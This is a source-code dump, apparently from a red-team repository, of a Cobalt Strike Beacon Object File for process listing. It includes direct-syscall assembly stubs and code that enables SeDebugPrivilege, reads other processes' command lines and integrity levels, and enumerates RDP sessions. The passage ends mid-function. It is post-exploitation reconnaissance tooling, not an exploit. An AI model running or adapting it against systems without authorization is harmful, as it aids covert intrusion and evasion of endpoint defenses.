    mov rax, 0x03C                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwWriteVirtualMemory:                            \n\
    mov rax, 0x037                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwCreateFile:                                    \n\
    mov rax, 0x052                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwClose:                                         \n\
    mov rax, 0x00C                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");


================================================
FILE: Process-BOF/process/base.c
================================================
#include "bofdefs.h"
#include <windows.h>
#include "beacon.h"
#ifndef bufsize
#define bufsize 8192
#endif

char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
WORD currentoutsize __attribute__((section (".data"))) = 0;
HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error

#ifdef BOF
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);
#endif
#ifdef BOF
int bofstart()
{   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    
    if (buffersize == -1)
        return;
    
    char* transferBuffer = (char*)intAlloc(bufsize);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{

    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}
#else
#define internal_printf printf
#define printoutput 
#define bofstart 
#endif

//release any global functions here
void bofstop()
{
#ifdef DYNAMIC_LIB_COUNT
    DWORD i;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        FreeLibrary(loadedLibraries[i].hMod);
    }
#endif
	return;
}


================================================
FILE: Process-BOF/process/psc.c
================================================
#include <ws2tcpip.h>
#include <windows.h>
#include "base.c"
#include <tchar.h>
#include <stdio.h>
#include <iphlpapi.h>
#include <wtsapi32.h>
#if defined(WOW64)
#include "Syscalls-WoW64.h"
#else
#include "Syscalls.h"
#endif

#ifdef __MINGW32__
#if(_WIN32_WINNT >= 0x0601)
#else
#undef _WIN32_WINNT
#define _WIN32_WINNT 0x0601
#endif
#endif
#define MAX_NAME 256
#define MAX_STRING 16384

LPWSTR g_lpwReadBuf = (LPWSTR)1;

enum IntegLevel {
	Untrusted = 0,
	LowIntegrity = 1,
	MediumIntegrity = 2,
	HighIntegrity = 3,
	SystemIntegrity = 4,
	ProtectedProcess = 5
};

typedef NTSTATUS(NTAPI* _NtOpenProcessToken)(
	IN HANDLE ProcessHandle,
	IN ACCESS_MASK DesiredAccess,
	OUT PHANDLE TokenHandle
	);

typedef void (WINAPI* _RtlInitUnicodeString)(
	PUNICODE_STRING DestinationString,
	PCWSTR SourceString
	);

typedef void(WINAPI* _RtlFreeUnicodeString)(
	PUNICODE_STRING UnicodeString
	);

typedef void (WINAPI* _RtlInitAnsiString)(
	PANSI_STRING DestinationString,
	PSTR SourceString
	);

typedef NTSTATUS(NTAPI* _RtlAnsiStringToUnicodeString)(
	PUNICODE_STRING DestinationString,
	PANSI_STRING SourceString,
	BOOLEAN AllocateDestinationString
	);

typedef BOOLEAN(NTAPI* _RtlEqualUnicodeString)(
	PUNICODE_STRING String1,
	PCUNICODE_STRING String2,
	BOOLEAN CaseInSensitive
	);

typedef NTSTATUS(NTAPI *_RtlWow64EnableFsRedirectionEx)(
	_In_ PVOID DisableFsRedirection,
	_Out_ PVOID *OldFsRedirectionLevel
	);

typedef NTSTATUS(NTAPI *_NtWow64QueryInformationProcess64) (
	IN HANDLE ProcessHandle,
	IN PROCESSINFOCLASS ProcessInformationClass,
	OUT PVOID ProcessInformation,
	IN ULONG ProcessInformationLength,
	OUT PULONG ReturnLength OPTIONAL
	);

typedef NTSTATUS(NTAPI *_NtWow64ReadVirtualMemory64)(
	IN HANDLE ProcessHandle,
	IN ULONG64 BaseAddress,
	OUT PVOID Buffer,
	IN ULONG64 Size,
	OUT PULONG64 NumberOfBytesRead
	);

typedef PULONG(NTAPI *_RtlSubAuthoritySid)(
	PSID  Sid,
	ULONG SubAuthority
	);

typedef PUCHAR(NTAPI *_RtlSubAuthorityCountSid)(
	_In_ PSID Sid
	);

typedef PWSTR(NTAPI *_RtlIpv4AddressToStringW)(
	struct in_addr *Addr,
	PWSTR S
	);

typedef PWSTR(NTAPI *_RtlIpv6AddressToStringW)(
	struct in6_addr *Addr,
	PWSTR S
	);

void ConvertUnicodeStringToChar(const wchar_t* src, size_t srcSize, char* dst, size_t dstSize)
{
    KERNEL32$WideCharToMultiByte(CP_ACP, 0, src, (int)srcSize, dst, (int)dstSize, NULL, NULL);
    dst[dstSize - 1] = '\0';
}

BOOL IsProcessWoW64(_In_ HANDLE hProcess) {
	NTSTATUS status;
	ULONG_PTR IsWow64 = 0;

	status = ZwQueryInformationProcess(hProcess, ProcessWow64Information, &IsWow64, sizeof(ULONG_PTR), NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	if (IsWow64 == 0) {
		return FALSE;
	}

	return TRUE;
}

ULONG GetPid() {
	PROCESS_BASIC_INFORMATION pbi = { 0 };
	
	NTSTATUS status = ZwQueryInformationProcess(NtCurrentProcess(), ProcessBasicInformation, &pbi, sizeof(pbi), NULL);
	if (status != STATUS_SUCCESS) {
		return 0;
	}

	return (ULONG)pbi.UniqueProcessId;
}

BOOL IsElevated() {
	BOOL fRet = FALSE;
	HANDLE hToken = NULL;

	_NtOpenProcessToken NtOpenProcessToken = (_NtOpenProcessToken)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtOpenProcessToken");
	if (NtOpenProcessToken == NULL) {
		return FALSE;
	}

	NTSTATUS status = NtOpenProcessToken(NtCurrentProcess(), TOKEN_QUERY, &hToken);
	if (status == STATUS_SUCCESS) {
		TOKEN_ELEVATION Elevation = { 0 };
		ULONG ReturnLength;

		status = ZwQueryInformationToken(hToken, TokenElevation, &Elevation, sizeof(Elevation), &ReturnLength);
		if (status == STATUS_SUCCESS) {
			fRet = Elevation.TokenIsElevated;
		}
	}

	if (hToken != NULL) {
		ZwClose(hToken);
	}

	return fRet;
}

BOOL SetDebugPrivilege() {
	HANDLE hToken = NULL;
	TOKEN_PRIVILEGES TokenPrivileges = { 0 };

	_NtOpenProcessToken NtOpenProcessToken = (_NtOpenProcessToken)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtOpenProcessToken");
	if (NtOpenProcessToken == NULL) {
		return FALSE;
	}

	NTSTATUS status = NtOpenProcessToken(NtCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	TokenPrivileges.PrivilegeCount = 1;
	TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

	LPCWSTR lpwPriv = L"SeDebugPrivilege";
	if (!ADVAPI32$LookupPrivilegeValueW(NULL, lpwPriv, &TokenPrivileges.Privileges[0].Luid)) {
		ZwClose(hToken);
		return FALSE;
	}

	status = ZwAdjustPrivilegesToken(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
	if (status != STATUS_SUCCESS) {
		ZwClose(hToken);
		return FALSE;
	}

	ZwClose(hToken);

	return TRUE;
}

LPWSTR GetProcessUser(_In_ HANDLE hProcess, _In_ BOOL bCloseHandle, _In_ BOOL bReturnDomainname, _In_ BOOL bReturnUsername) {
	HANDLE hToken = NULL;
	ULONG ReturnLength;
	PTOKEN_USER Ptoken_User = NULL;
	WCHAR lpName[MAX_NAME];
	WCHAR lpDomain[MAX_NAME];
	DWORD dwSize = MAX_NAME;
	LPWSTR lpwUser = NULL;
	SID_NAME_USE SidType;

	_NtOpenProcessToken NtOpenProcessToken = (_NtOpenProcessToken)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtOpenProcessToken");
	if (NtOpenProcessToken == NULL) {
		return NULL;
	}

	NTSTATUS status = NtOpenProcessToken(hProcess, TOKEN_QUERY, &hToken);
	if (status == STATUS_SUCCESS) {
		status = ZwQueryInformationToken(hToken, TokenUser, NULL, 0, &ReturnLength);
		if (status != STATUS_BUFFER_TOO_SMALL) {
			goto CleanUp;
		}

		Ptoken_User = (PTOKEN_USER)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, ReturnLength);
		status = ZwQueryInformationToken(hToken, TokenUser, Ptoken_User, ReturnLength, &ReturnLength);
		if (status != STATUS_SUCCESS) {
			goto CleanUp;
		}

		if (!ADVAPI32$LookupAccountSidW(NULL, Ptoken_User->User.Sid, lpName, &dwSize, lpDomain, &dwSize, &SidType)) {
			goto CleanUp;
		}

		lpwUser = (LPWSTR)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, MAX_NAME * sizeof(WCHAR));
		if (lpwUser != NULL) {
			if (bReturnDomainname) {
				MSVCRT$wcscat_s(lpwUser, MAX_NAME, lpDomain);
				if (bReturnUsername) {
					MSVCRT$wcscat_s(lpwUser, MAX_NAME, L"\\");
				}
			}
			if (bReturnUsername) {
				MSVCRT$wcscat_s(lpwUser, MAX_NAME, lpName);
			}
		}
	}
	
CleanUp:
	
	MSVCRT$memset(lpName, 0, MAX_NAME * sizeof(WCHAR));
	MSVCRT$memset(lpDomain, 0, MAX_NAME * sizeof(WCHAR));

	if (hProcess != NULL && bCloseHandle) {
		ZwClose(hProcess);
	}
	
	if (hToken != NULL) {
		if (Ptoken_User != NULL){
			KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, Ptoken_User);
		}
		ZwClose(hToken);
	}

	return lpwUser;
}

DWORD IntegrityLevel(_In_ HANDLE hProcess) {
	HANDLE hToken = NULL;
	ULONG ReturnLength;
	PTOKEN_MANDATORY_LABEL pTIL = NULL;
	DWORD dwIntegrityLevel;
	DWORD dwRet = 0;

	_NtOpenProcessToken NtOpenProcessToken = (_NtOpenProcessToken)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtOpenProcessToken");
	if (NtOpenProcessToken == NULL) {
		return 0;
	}
	
	_RtlSubAuthoritySid RtlSubAuthoritySid = (_RtlSubAuthoritySid)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlSubAuthoritySid");
	if (RtlSubAuthoritySid == NULL) {
		return 0;
	}

	_RtlSubAuthorityCountSid RtlSubAuthorityCountSid = (_RtlSubAuthorityCountSid)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlSubAuthorityCountSid");
	if (RtlSubAuthorityCountSid == NULL) {
		return 0;
	}

	NTSTATUS status = NtOpenProcessToken(hProcess, TOKEN_QUERY, &hToken);
	if (status == STATUS_SUCCESS) {
		status = ZwQueryInformationToken(hToken, TokenIntegrityLevel, NULL, 0, &ReturnLength);
		if (status != STATUS_BUFFER_TOO_SMALL) {
			goto CleanUp;
		}

		pTIL = (PTOKEN_MANDATORY_LABEL)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, ReturnLength);
		status = ZwQueryInformationToken(hToken, TokenIntegrityLevel, pTIL, ReturnLength, &ReturnLength);
		if (status != STATUS_SUCCESS) {
			goto CleanUp;
		}

		dwIntegrityLevel = *RtlSubAuthoritySid(pTIL->Label.Sid, (DWORD)(UCHAR)(*RtlSubAuthorityCountSid(pTIL->Label.Sid) - 1));

		if (dwIntegrityLevel == SECURITY_MANDATORY_UNTRUSTED_RID) {
			dwRet = Untrusted;
		}
		else if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID) {
			dwRet = LowIntegrity;
		}
		else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID && dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID) {
			dwRet = MediumIntegrity;
		}
		else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID && dwIntegrityLevel < SECURITY_MANDATORY_SYSTEM_RID) {
			dwRet = HighIntegrity;
		}
		else if (dwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID && dwIntegrityLevel < SECURITY_MANDATORY_PROTECTED_PROCESS_RID) {
			dwRet = SystemIntegrity;
		}
		else if (dwIntegrityLevel == SECURITY_MANDATORY_PROTECTED_PROCESS_RID) {
			dwRet = ProtectedProcess;
		}
		else {
			goto CleanUp;
		}
	}

CleanUp:

	if (hToken != NULL) {
		ZwClose(hToken);
	}

	if (pTIL != NULL) {
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pTIL);
	}

	return dwRet;
}

BOOL EnumPeb(_In_ HANDLE hProcess) {
	PROCESS_BASIC_INFORMATION pbi = { 0 };
	PEB peb = { 0 };
	RTL_USER_PROCESS_PARAMETERS upp = { 0 };

	NTSTATUS status = ZwQueryInformationProcess(hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	status = ZwReadVirtualMemory(hProcess, pbi.PebBaseAddress, &peb, sizeof(peb), NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	status = ZwReadVirtualMemory(hProcess, peb.ProcessParameters, &upp, sizeof(RTL_USER_PROCESS_PARAMETERS), NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	if (g_lpwReadBuf <= (LPWSTR)1) { // For BOF we need to avoid large stack buffers, so put unicode string data on heap.
		g_lpwReadBuf = (LPWSTR)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, MAX_STRING * sizeof(WCHAR));
		if (g_lpwReadBuf == NULL) {
			return FALSE;
		}
	}

	status = ZwReadVirtualMemory(hProcess, upp.ImagePathName.Buffer, g_lpwReadBuf, upp.ImagePathName.Length, NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}
	g_lpwReadBuf[upp.ImagePathName.Length / sizeof(WCHAR)] = L'\0';
	SIZE_T pnLength = upp.ImagePathName.Length;
	char * convertedPN = intAlloc(pnLength + 1);
	ConvertUnicodeStringToChar(g_lpwReadBuf, pnLength + 1, convertedPN, pnLength + 1);
	internal_printf("%-18s%s\n", "    ImagePath:", convertedPN);
	intFree(convertedPN);

	status = ZwReadVirtualMemory(hProcess, upp.CommandLine.Buffer, g_lpwReadBuf, upp.CommandLine.Length, NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}
	g_lpwReadBuf[upp.CommandLine.Length / sizeof(WCHAR)] = L'\0';
	SIZE_T cmdLength = upp.CommandLine.Length;
	char * convertedCMD = intAlloc(cmdLength + 1);
	ConvertUnicodeStringToChar(g_lpwReadBuf, cmdLength + 1, convertedCMD, cmdLength + 1);
	internal_printf("%-18s%s\n", "    CommandLine:", convertedCMD);
	intFree(convertedCMD);
	
	MSVCRT$memset(g_lpwReadBuf, 0, MAX_STRING * sizeof(WCHAR));

	return TRUE;
}

BOOL EnumPebFromWoW64(_In_ HANDLE hProcess) {
	PROCESS_BASIC_INFORMATION_WOW64 pbi64 = { 0 };
	PEB64 peb64 = { 0 };
	RTL_USER_PROCESS_PARAMETERS64 upp64 = { 0 };

	_NtWow64QueryInformationProcess64 NtWow64QueryInformationProcess64 = (_NtWow64QueryInformationProcess64)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWow64QueryInformationProcess64");
	if (NtWow64QueryInformationProcess64 == NULL) {
		return FALSE;
	}

	_NtWow64ReadVirtualMemory64 NtWow64ReadVirtualMemory64 = (_NtWow64ReadVirtualMemory64)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWow64ReadVirtualMemory64");
	if (NtWow64ReadVirtualMemory64 == NULL) {
		return FALSE;
	}

	NTSTATUS status = NtWow64QueryInformationProcess64(hProcess, ProcessBasicInformation, &pbi64, sizeof(pbi64), NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	status = NtWow64ReadVirtualMemory64(hProcess, pbi64.PebBaseAddress, &peb64, sizeof(peb64), NULL);
	if (status != STATUS_SUCCESS) {
		BeaconPrintf(CALLBACK_ERROR, "NtWow64ReadVirtualMemory64 Failed, status: 0x%08x", status);
		return FALSE;
	}

	status = NtWow64ReadVirtualMemory64(hProcess, peb64.ProcessParameters, &upp64, sizeof(RTL_USER_PROCESS_PARAMETERS64), NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	if (g_lpwReadBuf <= (LPWSTR)1) { // For BOF we need to avoid large stack buffers, so put unicode string data on heap.
		g_lpwReadBuf = (LPWSTR)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, MAX_STRING * sizeof(WCHAR));
		if (g_lpwReadBuf == NULL) {
			return FALSE;
		}
	}

	status = NtWow64ReadVirtualMemory64(hProcess, upp64.ImagePathName.Buffer, g_lpwReadBuf, upp64.ImagePathName.Length, NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}
	g_lpwReadBuf[upp64.ImagePathName.Length / sizeof(WCHAR)] = L'\0';
	SIZE_T pnLength = upp64.ImagePathName.Length;
	char * convertedPN = intAlloc(pnLength + 1);
	ConvertUnicodeStringToChar(g_lpwReadBuf, pnLength + 1, convertedPN, pnLength + 1);
	internal_printf("%-18s%s\n", "    ImagePath:", convertedPN);
	intFree(convertedPN);

	status = NtWow64ReadVirtualMemory64(hProcess, upp64.CommandLine.Buffer, g_lpwReadBuf, upp64.CommandLine.Length, NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}
	g_lpwReadBuf[upp64.CommandLine.Length / sizeof(WCHAR)] = L'\0';
	SIZE_T cmdLength = upp64.CommandLine.Length;
	char * convertedCMD = intAlloc(cmdLength + 1);
	ConvertUnicodeStringToChar(g_lpwReadBuf, cmdLength + 1, convertedCMD, cmdLength + 1);
	internal_printf("%-18s%s\n", "    CommandLine:", convertedCMD);
	intFree(convertedCMD);
	
	MSVCRT$memset(g_lpwReadBuf, 0, MAX_STRING * sizeof(WCHAR));

	return TRUE;
}

BOOL EnumFileProperties(_In_ HANDLE ProcessId, _In_ PUNICODE_STRING uProcImage) {
	NTSTATUS status;
	SYSTEM_PROCESS_ID_INFORMATION pInfo;
	UNICODE_STRING uImageName;
	IO_STATUS_BLOCK IoStatusBlock;
	OBJECT_ATTRIBUTES FileObjectAttributes;
	HANDLE hFile = NULL;
	DWORD dwBinaryType = SCS_32BIT_BINARY;
	PBYTE lpVerInfo = NULL;
	LPWSTR lpCompany = NULL;
	LPWSTR lpDescription = NULL;
	LPWSTR lpProductVersion = NULL;

	MSVCRT$memset(&pInfo, 0, sizeof(SYSTEM_PROCESS_ID_INFORMATION));
	if (ProcessId != NULL){
		pInfo.ProcessId = ProcessId;
		pInfo.ImageName.Length = 0;
		pInfo.ImageName.MaximumLength = MAX_PATH;
		pInfo.ImageName.Buffer = NULL;

		pInfo.ImageName.Buffer = (PWSTR)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, pInfo.ImageName.MaximumLength + 1);

		status = ZwQuerySystemInformation(88, &pInfo, sizeof(pInfo), NULL);
		if (status != STATUS_SUCCESS) {
			goto CleanUp;
		}

		InitializeObjectAttributes(&FileObjectAttributes, &pInfo.ImageName, OBJ_CASE_INSENSITIVE, NULL, NULL);
	}
	else if (uProcImage != NULL){
		InitializeObjectAttributes(&FileObjectAttributes, uProcImage, OBJ_CASE_INSENSITIVE, NULL, NULL);
	}
	else{
		goto CleanUp;
	}

	MSVCRT$memset(&IoStatusBlock, 0, sizeof(IoStatusBlock));
	NTSTATUS Status = ZwCreateFile(&hFile, GENERIC_READ | SYNCHRONIZE, &FileObjectAttributes, &IoStatusBlock, 0,
		0, FILE_SHARE_READ, FILE_OPEN, FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);

	if (hFile == INVALID_HANDLE_VALUE && Status != STATUS_SUCCESS) {
		goto CleanUp;
	}

	WCHAR lpszFilePath[MAX_PATH] = { 0 };
	DWORD dwResult = KERNEL32$GetFinalPathNameByHandleW(hFile, lpszFilePath, _countof(lpszFilePath) - 1, VOLUME_NAME_DOS);
	if (dwResult == 0) {
		goto CleanUp;
	}
	else if (dwResult >= _countof(lpszFilePath)) {
		goto CleanUp;
	}

	LPWSTR pwszPath = NULL;
	LPWSTR pwszJunk = MSVCRT$wcstok_s(lpszFilePath, L"\\", &pwszPath);
	if (pwszJunk == NULL || pwszPath == NULL) {
		goto CleanUp;
	}
    SIZE_T pnLength = KERNEL32$lstrlenW(pwszPath);
    char * convertedPN = intAlloc(pnLength + 1);
    ConvertUnicodeStringToChar(pwszPath, pnLength + 1, convertedPN, pnLength + 1);
    internal_printf("%-18s%s\n", "    Path:",  convertedPN);
    intFree(convertedPN);

	if (KERNEL32$GetBinaryTypeW(pwszPath, &dwBinaryType)) {
		if (dwBinaryType == SCS_64BIT_BINARY) {
            internal_printf("%-18s%s\n", "    ImageType:", "64-bit");
		}
		else {
            internal_printf("%-18s%s\n", "    ImageType:", "32-bit");
		}
	}

	DWORD dwHandle = 0;
	DWORD dwLen = VERSION$GetFileVersionInfoSizeW(pwszPath, &dwHandle);
	if (!dwLen) {
		goto CleanUp;
	}

	lpVerInfo = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, dwLen);
	if (lpVerInfo == NULL) {
		goto CleanUp;
	}

	if (!VERSION$GetFileVersionInfoW(pwszPath, 0L, dwLen, lpVerInfo)) {
		goto CleanUp;
	}

	struct LANGANDCODEPAGE {
		WORD wLanguage;
		WORD wCodePage;
	} *lpTranslate;


	WCHAR wcCodePage[MAX_PATH];
	MSVCRT$memset(&wcCodePage, 0, sizeof(wcCodePage));
	WCHAR wcCompanyName[MAX_PATH];
	MSVCRT$memset(&wcCompanyName, 0, sizeof(wcCompanyName));
	WCHAR wcDescription[MAX_PATH];
	MSVCRT$memset(&wcDescription, 0, sizeof(wcDescription));
	WCHAR wcProductVersion[MAX_PATH];
	MSVCRT$memset(&wcProductVersion, 0, sizeof(wcProductVersion));

	UINT uLen;
	if (VERSION$VerQueryValueW(lpVerInfo, L"\\VarFileInfo\\Translation", (void **)&lpTranslate, &uLen)) {
		MSVCRT$swprintf_s(wcCodePage, _countof(wcCodePage), L"%04x%04x", lpTranslate->wLanguage, lpTranslate->wCodePage);

		MSVCRT$wcscat_s(wcCompanyName, _countof(wcCompanyName), L"\\StringFileInfo\\");
		MSVCRT$wcscat_s(wcCompanyName, _countof(wcCompanyName), wcCodePage);
		MSVCRT$wcscat_s(wcCompanyName, _countof(wcCompanyName), L"\\CompanyName");

		MSVCRT$wcscat_s(wcDescription, _countof(wcDescription), L"\\StringFileInfo\\");
		MSVCRT$wcscat_s(wcDescription, _countof(wcDescription), wcCodePage);
		MSVCRT$wcscat_s(wcDescription, _countof(wcDescription), L"\\FileDescription");

		MSVCRT$wcscat_s(wcProductVersion, _countof(wcProductVersion), L"\\StringFileInfo\\");
		MSVCRT$wcscat_s(wcProductVersion, _countof(wcProductVersion), wcCodePage);
		MSVCRT$wcscat_s(wcProductVersion, _countof(wcProductVersion), L"\\ProductVersion");

		if (VERSION$VerQueryValueW(lpVerInfo, wcCompanyName, (void **)&lpCompany, &uLen)) {
			SIZE_T pnLength = uLen;
            char * convertedPN = intAlloc(pnLength + 1);
            ConvertUnicodeStringToChar(lpCompany, pnLength + 1, convertedPN, pnLength + 1);
            internal_printf("%-18s%s\n", "    Company:",  convertedPN);
            intFree(convertedPN);
		}

		if (VERSION$VerQueryValueW(lpVerInfo, wcDescription, (void **)&lpDescription, &uLen)) {
			SIZE_T pnLength = uLen;
            char * convertedPN = intAlloc(pnLength + 1);
            ConvertUnicodeStringToChar(lpDescription, pnLength + 1, convertedPN, pnLength + 1);
            internal_printf("%-18s%s\n", "    Description:",  convertedPN);
            intFree(convertedPN);
		}

		if (VERSION$VerQueryValueW(lpVerInfo, wcProductVersion, (void **)&lpProductVersion, &uLen)) {
			SIZE_T pnLength = uLen;
            char * convertedPN = intAlloc(pnLength + 1);
            ConvertUnicodeStringToChar(lpProductVersion, pnLength + 1, convertedPN, pnLength + 1);
            internal_printf("%-18s%s\n", "    Version:",  convertedPN);
            intFree(convertedPN);
		}
	
	}


CleanUp:

	if (hFile != NULL && hFile != INVALID_HANDLE_VALUE) {
		ZwClose(hFile);
	}

	if (pInfo.ImageName.Buffer != NULL) {
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pInfo.ImageName.Buffer);
	}

	if (lpVerInfo != NULL) {
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, lpVerInfo);
	}

	return TRUE;
}

BOOL EnumKernel() {
	NTSTATUS status;
	LPVOID pModInfoBuffer = NULL;
	SIZE_T modInfoSize = 0x10000;
	ULONG uReturnLength = 0;
	PSYSTEM_MODULE_INFORMATION pModuleInfo = NULL;
	ANSI_STRING aKernelImage;
	UNICODE_STRING uKernelImage;

	_RtlInitAnsiString RtlInitAnsiString = (_RtlInitAnsiString)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitAnsiString");
	if (RtlInitAnsiString == NULL) {
        BeaconPrintf(CALLBACK_ERROR, "GetProcAddress failed.\n");
		return FALSE;
	}

	_RtlAnsiStringToUnicodeString RtlAnsiStringToUnicodeString = (_RtlAnsiStringToUnicodeString)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlAnsiStringToUnicodeString");
	if (RtlAnsiStringToUnicodeString == NULL) {
        BeaconPrintf(CALLBACK_ERROR, "GetProcAddress failed.\n");
		return FALSE;
	}

	_RtlFreeUnicodeString RtlFreeUnicodeString = (_RtlFreeUnicodeString)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlFreeUnicodeString");
	if (RtlFreeUnicodeString == NULL) {
        BeaconPrintf(CALLBACK_ERROR, "GetProcAddress failed.\n");
		return FALSE;
	}

	do {
		pModInfoBuffer = NULL;
		status = ZwAllocateVirtualMemory(NtCurrentProcess(), &pModInfoBuffer, 0, &modInfoSize, MEM_COMMIT, PAGE_READWRITE);
		if (status != STATUS_SUCCESS) {
			BeaconPrintf(CALLBACK_ERROR, "Failed to allocate memory.");
			return FALSE;
		}

		status = ZwQuerySystemInformation(88, pModInfoBuffer, (ULONG)modInfoSize, &uReturnLength);
		if (status == STATUS_INFO_LENGTH_MISMATCH) {
			ZwFreeVirtualMemory(NtCurrentProcess(), &pModInfoBuffer, &modInfoSize, MEM_RELEASE);
			modInfoSize += uReturnLength;
		}

	} while (status != STATUS_SUCCESS);

	pModuleInfo = (PSYSTEM_MODULE_INFORMATION)pModInfoBuffer;
	RtlInitAnsiString(&aKernelImage, (PSTR)pModuleInfo->Module[0].FullPathName);
	
	RtlAnsiStringToUnicodeString(&uKernelImage, &aKernelImage, TRUE);
	if (uKernelImage.Buffer != NULL) {
		EnumFileProperties(NULL, &uKernelImage);
	}

CleanUp:

	if (pModInfoBuffer == NULL) {
		ZwFreeVirtualMemory(NtCurrentProcess(), &pModInfoBuffer, &modInfoSize, MEM_RELEASE);
	}

	if (uKernelImage.Buffer != NULL) {
		RtlFreeUnicodeString(&uKernelImage);
	}

	return TRUE;
}

BOOL EnumRDPSessions() {
	BOOL bResult = FALSE;
	PWTS_SESSION_INFOW pSessions = NULL;
	DWORD pCount = 0;

	if (!WTSAPI32$WTSEnumerateSessionsW(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pSessions, &pCount)) {
		goto CleanUp;
	}

	for (DWORD i = 0; i < pCount; i++) {
		LPWSTR lpUserName = NULL;
		LPWSTR lpDomainName = NULL;
		LPWSTR lpClientAddress = NULL;
		LPWSTR lpClientName = NULL;
		DWORD pBytesReturned = 0;

		if (!WTSAPI32$WTSQuerySessionInformationW(WTS_CURRENT_SERVER_HANDLE, pSessions[i].SessionId, WTSUserName, &lpUserName, &pBytesReturned)) {
			goto CleanUp;
		}

		if (!WTSAPI32$WTSQuerySessionInformationW(WTS_CURRENT_SERVER_HANDLE, pSessions[i].SessionId, WTSDomainName, &lpDomainName, &pBytesReturned)) {
			goto CleanUp;
		}

		if (!WTSAPI32$WTSQuerySessionInformationW(WTS_CURRENT_SERVER_HANDLE, pSessions[i].SessionId, WTSClientName, &lpClientName, &pBytesReturned)) {
			goto CleanUp;
